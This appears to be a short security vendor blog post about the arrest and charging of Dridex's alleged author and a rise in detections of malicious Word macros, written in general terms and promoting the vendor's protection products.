The UK National Crime Agency together with the FBI and the US Department of Justice recently filed charges against the author of Bugat/Cridex/Dridex. Andrey Ghinkul was arrested on August 28, 2015 in Cyprus and the US is now seeking his extradition. Dridex has reportedly caused multi-million dollar losses to financial institutions and businesses globally.
Dridex is known to propagate via Microsoft Word documents which pretend to be legitimate but contain malicious macro code. These macros will eventually download an executable from its C&C and/or a compromised website. F-Secure has generic detection (Trojan:W97M/MaliciousMacro.GEN) that specifically looks for malicious macros inside Office document files.
As the authorities are cleaning up the Dridex botnet, detections for malicious macros has been felt and a spike can be seen in our back end statistics.
F-Secure customers are protected by our Hydra (scanning engine) and DeepGuard (behavioral-based) technologies.
Besides having generic signature detection of malicious macros, our DeepGuard behavioral engine also blocks. Two layers of protection are better than one.
A document dropping an executable? Yeah, that’s never a good thing.
Q: Are these Dridex activities all related to authorities taking down the botnet?
A: We don’t know.